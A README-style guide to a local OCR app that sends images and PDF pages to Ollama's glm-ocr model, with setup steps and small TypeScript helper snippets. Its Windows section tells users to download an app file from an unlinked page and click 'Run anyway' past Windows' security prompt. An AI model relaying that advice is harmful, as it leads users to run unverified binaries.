Visit this page to download and run the app on Windows:
- Open the download page in your web browser.
- Download the Windows version of the app from the page.
- If the file is in a ZIP folder, right-click it and choose Extract All.
- Open the extracted folder.
- Double-click the app file to start it.
- If Windows shows a security prompt, choose More info and then Run anyway.
- Keep the app open in your browser or desktop window.
- Open Ollama if the app asks for it.
- Upload an image or PDF
- Turn PDF pages into images before OCR
- Send the image to an OCR model
- Stream the text back into the page
- Show the result as markdown
- A Windows computer
- Internet access for the first download
- Ollama installed on your computer
- The glm-ocr model
- A modern web browser like Chrome, Edge, or Firefox
- Install Ollama from the official Ollama site.
- Open Ollama after install.
- Pull the OCR model with this command:
  ollama pull glm-ocr
- Wait for the model to finish downloading.
- Keep Ollama open while you use the app.
Use these steps if you want to run the app from source:
- Install Node.js on your computer.
- Download this repository.
- Open a terminal in the project folder.
- Install the app files:
  npm install
- Copy the example env file:
  cp .env.example .env
- Start the app:
  npm run dev
- Open the local address shown in the terminal.
- Upload an image or PDF.
- Open the app.
- Choose an image or PDF from your computer.
- If you upload a PDF, the app shows one page at a time.
- Move through the pages as needed.
- Wait while the OCR model reads the file.
- Read the text on the page as it appears.
- Copy the result if you want to save it elsewhere.
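The text appears bit by bit because the OCR result is streamed. As a rough sketch of how that can work, assume the app reads Ollama's `/api/generate` stream, where each line is a JSON object with a `response` text fragment and a `done` flag. The `NdjsonTextCollector` class below is a hypothetical helper for illustration, not the app's actual code. It buffers incoming chunks and only parses complete lines, because a network chunk can end in the middle of a JSON object.

```typescript
// One streamed line from Ollama's /api/generate endpoint (only the fields used here).
interface GenerateChunk {
  response?: string;
  done?: boolean;
}

// Hypothetical helper: collects streamed chunks and extracts text line by line.
class NdjsonTextCollector {
  private buffer = "";
  text = "";
  done = false;

  // Feed one raw chunk; returns only the text that this chunk completed.
  push(chunk: string): string {
    this.buffer += chunk;
    const lines = this.buffer.split("\n");
    // The last element is an unfinished line (or ""), so keep it for the next push.
    this.buffer = lines.pop() ?? "";

    let added = "";
    for (const line of lines) {
      const trimmed = line.trim();
      if (trimmed === "") continue;
      const parsed = JSON.parse(trimmed) as GenerateChunk;
      added += parsed.response ?? "";
      if (parsed.done) this.done = true;
    }
    this.text += added;
    return added;
  }
}
```

Each call to `push` returns the new text to append to the page, and `text` holds the full result once `done` is true.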
When you upload a PDF, the app does not read the file as plain text.
It first renders the current page as an image.
Then it sends that image to the OCR model.
This helps with scanned PDFs, photos of pages, and files that do not contain selectable text.
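To make the render-then-OCR flow concrete, here is a minimal sketch of the request that could carry a rendered page to Ollama. It assumes the page image arrives as a data URL (for example from a canvas) and that the app posts to `/api/generate`, which accepts base64 images in an `images` array. The function names and the prompt text are placeholders, not taken from the app.

```typescript
// Body fields accepted by Ollama's /api/generate endpoint (subset used here).
interface OcrRequestBody {
  model: string;
  prompt: string;
  images: string[]; // raw base64 strings, without the "data:...;base64," prefix
  stream: boolean;
}

// Ollama expects raw base64, so drop the data URL header if one is present.
function stripDataUrlPrefix(dataUrl: string): string {
  const comma = dataUrl.indexOf(",");
  return dataUrl.startsWith("data:") && comma !== -1
    ? dataUrl.slice(comma + 1)
    : dataUrl;
}

// Hypothetical helper: builds the JSON body for one rendered page.
function buildOcrRequest(
  pageImageDataUrl: string,
  model: string = "glm-ocr",
  // Placeholder prompt; the wording the app actually sends is not documented here.
  prompt: string = "Extract the text from this image as markdown."
): OcrRequestBody {
  return {
    model,
    prompt,
    images: [stripDataUrlPrefix(pageImageDataUrl)],
    stream: true, // ask for incremental output
  };
}
```

Because only the rendered image is sent, the same request shape works for a scanned page, a photo, or an uploaded PNG.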
You can set the default OCR connection in .env.
VITE_OCR_BASE_URL=/api/proxy
VITE_OCR_ENDPOINT=/api/generate
VITE_OCR_MODEL=glm-ocr
OCR_PROXY_TARGET=http://127.0.0.1:11434
- VITE_OCR_BASE_URL: The base path the app uses for OCR requests
- VITE_OCR_ENDPOINT: The API path used to send OCR jobs
- VITE_OCR_MODEL: The model name the app sends to Ollama
- OCR_PROXY_TARGET: The local Ollama address on your computer
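The sketch below shows one way these settings could combine into the address the browser calls. It assumes the app joins the base path and the endpoint, and that a local proxy forwards anything under `/api/proxy` to `OCR_PROXY_TARGET`. Both are assumptions. In a Vite project only variables prefixed with `VITE_` are exposed to browser code, which would explain why the proxy target has no prefix. `resolveConfig` and `requestUrl` are hypothetical names.

```typescript
interface OcrConfig {
  baseUrl: string;
  endpoint: string;
  model: string;
}

// Read the settings from an env-like object, falling back to the documented defaults.
function resolveConfig(env: Record<string, string | undefined>): OcrConfig {
  return {
    baseUrl: env["VITE_OCR_BASE_URL"] ?? "/api/proxy",
    endpoint: env["VITE_OCR_ENDPOINT"] ?? "/api/generate",
    model: env["VITE_OCR_MODEL"] ?? "glm-ocr",
  };
}

// Join base and endpoint with exactly one slash between them.
function requestUrl(config: OcrConfig): string {
  const base = config.baseUrl.replace(/\/+$/, "");
  const path = config.endpoint.replace(/^\/+/, "");
  return `${base}/${path}`;
}
```

With the default values this gives `/api/proxy/api/generate`. Under the proxy assumption, that request ends up at `http://127.0.0.1:11434/api/generate`.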
If the app does not work as expected, check these items:
- Ollama is open and running.
- The glm-ocr model is installed.
- The app can reach http://127.0.0.1:11434.
- Your browser allows local app access.
- You uploaded a supported file type such as PNG, JPG, JPEG, or PDF.
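You can check the first three items in one step by opening `http://127.0.0.1:11434/api/tags` in your browser. Ollama answers with a JSON list of installed models. The small sketch below shows how that answer could be checked in code. `hasModel` is a hypothetical helper, and it assumes installed models are listed under `models` with a `name` such as `glm-ocr:latest`.

```typescript
// Subset of the JSON returned by Ollama's GET /api/tags endpoint.
interface TagsResponse {
  models?: { name: string }[];
}

// True if the wanted model is installed, with or without a tag suffix like ":latest".
function hasModel(tags: TagsResponse, wanted: string): boolean {
  return (tags.models ?? []).some(
    (m) => m.name === wanted || m.name.startsWith(`${wanted}:`)
  );
}
```

If the page does not load at all, Ollama is not running. If it loads but `glm-ocr` is missing from the list, pull the model again.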
- PNG
- JPG
- JPEG
- Windows 10 or later
- 8 GB RAM or more
- A few GB of free disk space
- A GPU helps, but the app can run on CPU
- A stable local Ollama install
- Download the app from the link above.
- Install Ollama.
- Pull glm-ocr.
- Start Ollama.
- Open the app.
- Upload a file.
- Read the OCR output in the page.
This app helps you test OCR on local files without sending them to a cloud service.
It is useful for scanned documents, screenshots, and PDFs that need text extraction.